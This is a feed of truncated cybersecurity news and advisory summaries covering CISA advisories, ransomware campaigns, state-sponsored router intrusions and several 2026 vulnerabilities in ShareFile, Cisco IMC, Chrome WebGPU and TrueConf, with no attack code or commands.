soc

Advisory at a Glance Executive Summary CISA began incident response efforts at a U.S. federal civilian executive branch (FCEB) agency following the detection of potential malicious activity identified through security alerts generated by the agency’s endpoint detection and response (EDR) tool. CISA identified three lessons learned from the engagement that illuminate how to effectively mitigate […]

Executive summary People’s Republic of China (PRC) state-sponsored cyber threat actors are targeting networks globally, including, but not limited to, telecommunications, government, transportation, lodging, and military infrastructure networks. While these actors focus on large backbone routers of major telecommunications providers, as well as provider edge (PE) and customer edge (CE) routers, they also leverage compromised […]

Summary The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this advisory in response to ransomware actors leveraging unpatched instances of a vulnerability in SimpleHelp Remote Monitoring and Management (RMM) to compromise customers of a utility billing software provider. This incident reflects a broader pattern of ransomware actors targeting organizations through unpatched versions of SimpleHelp […]

Summary Note: This joint Cybersecurity Advisory is being published as an addition to the Cybersecurity and Infrastructure Security Agency (CISA) May 6, 2025, joint fact sheet Primary Mitigations to Reduce Cyber Threats to Operational Technology and European Cybercrime Centre’s (EC3) Operation Eastwood, in which CISA, Federal Bureau of Investigation (FBI), Department of Energy (DOE), Environmental […]

Progress ShareFile Flaws CVE-2026-2699 & CVE-2026-2701 RCE A newly disclosed Progress ShareFile pre-auth RCE chain is drawing attention after researchers showed how CVE-2026-2699 and CVE-2026-2701 can be combined to compromise exposed Storage Zones Controller 5.x servers. The issue affects customer-managed ShareFile deployments that rely on the older 5.x branch, not every ShareFile environment. watchTowr publicly […]

CVE-2026-20093: Critical Cisco IMC Flaw Allows Unauthenticated Admin Access to UCS Servers CVE-2026-20093, is an authentication bypass flaw found in the change password functionality of Cisco Integrated Management Controller (IMC). It could allow an unauthenticated, remote attacker to bypass authentication mechanisms and gain unauthorized access to the system with Administrator privileges. What Is CVE-2026-20093? CVE-2026-20093 […]

CVE-2026-5281: Chrome WebGPU Zero-Day Exploited In The Wild Google patched CVE-2026-5281, a high-severity use-after-free (CWE-416) vulnerability in Dawn, Chromium’s WebGPU implementation. The company has confirmed exploitation in the wild, and CISA added it to the Known Exploited Vulnerabilities (KEV) catalog with a remediation deadline for federal agencies. This post breaks down what CVE-2026-5281 is, who […]

BLACKNET-00: The Ransomware-as-a-Service Platform That Weaponizes Mediocrity How a Custom Ransomware Builder Collapses the Technical Barrier Between Script Kiddies and Enterprise-Grade Ransomware Operations Executive Summary A threat actor named Infrastructure Destruction Squad announced BLACKNET-00 via Telegram, a fully GUI-driven ransomware builder that requires zero programming knowledge to operate. Featuring layered encryption (AES-256, RSA, ChaCha20), a […]

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.  CVE-2026-3502 TrueConf Client Download of Code Without Integrity Check Vulnerability  This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise.  Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited […]

Trivy-Linked Cisco Breach & ShinyHunters’ Stolen Data ClaimCisco is facing fresh scrutiny after a breach of its internal development environment was linked to the Trivy supply chain compromise. A ShinyHunters extortion claim has since surfaced, alleging theft of Salesforce data, GitHub repositories, and AWS assets.This post outlines what is currently known, what remains unverified, and where the […]